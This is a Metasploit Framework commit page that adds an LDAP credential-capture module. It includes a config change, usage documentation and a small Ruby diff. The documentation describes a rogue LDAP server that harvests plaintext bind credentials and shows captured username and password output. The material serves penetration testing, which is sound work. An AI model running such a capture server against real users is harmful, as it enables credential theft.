Land #18678, add LDAP capture capabilities

rapid7 · Feb 15, 2024 · 7b56d01 · 7b56d01
2 parents 1d9a08f + 40701bf
commit 7b56d01
Show file tree

Hide file tree

Showing 9 changed files with 1,092 additions and 70 deletions.
diff --git a/data/capture_config.yaml b/data/capture_config.yaml
@@ -16,6 +16,8 @@ services:
     enabled: yes
   - type: IMAP
     enabled: yes
+  - type: LDAP
+    enabled: yes
   - type: MSSQL
     enabled: yes
   - type: MySQL

diff --git a/documentation/modules/auxiliary/server/capture/ldap.md b/documentation/modules/auxiliary/server/capture/ldap.md
@@ -0,0 +1,52 @@
+
+## Vulnerable Application
+
+This module emulates an LDAP Server which accepts User Bind Request to capture the User Credentials.
+Upon receiving successful Bind Request, a `ldap_bind: Authentication method not supported (7)` error is sent to the User
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/server/capture/ldap`
+3. Do: `run`
+4. From a new shell or workstation, perform a ldap bind request involving User credentials.
+5. Check the database using `creds` for the user authentication information.
+
+## Options
+
+  **Authentication**
+
+The type of LDAP authentication to capture. The default type is `Simple`
+
+## Scenarios
+
+### Metasploit Server
+
+```
+msf6 > use auxiliary/server/capture/ldap
+msf6 auxiliary(server/capture/ldap) > run
+
+[*] Server started.
+[+] LDAP Login attempt => From:10.0.2.15:48198 Username:User Password:Pass
+```
+
+### Client
+
+```
+└─$ ldapsearch -LLL -H ldap://10.0.2.15 -D cn=User,dc=example,dc=com -W
+Enter LDAP Password: 
+ldap_bind: Auth Method Not Supported (7)
+        additional info: Auth Method Not Supported
+```
+
+**Database**
+
+```
+msf6 auxiliary(server/capture/ldap) > creds
+Credentials
+===========
+
+host       origin     service         public  private  realm        private_type  JtR Format
+----       ------     -------         ------  -------  -----        ------------  ----------
+10.0.2.15  10.0.2.15  389/tcp (ldap)  User    Pass     example.com  Password      
+```
diff --git a/lib/msf/core/exploit/remote/ldap/server.rb b/lib/msf/core/exploit/remote/ldap/server.rb
@@ -76,6 +76,13 @@ def on_send_response(cli, data)
       #
       def start_service
         comm = _determine_server_comm(bindhost)
+        auth_handler = Rex::Proto::LDAP::Auth.new(
+          datastore['CHALLENGE'],
+          datastore['Domain'],
+          datastore['Server'],
+          datastore['DnsName'],
+          datastore['DnsDomain']
+        )
         self.service = Rex::ServiceManager.start(
           Rex::Proto::LDAP::Server,
           bindhost,
@@ -84,6 +91,7 @@ def start_service
           datastore['LdapServerTcp'],
           read_ldif,
           comm,
+          auth_handler,
           { 'Msf' => framework, 'MsfExploit' => self }
         )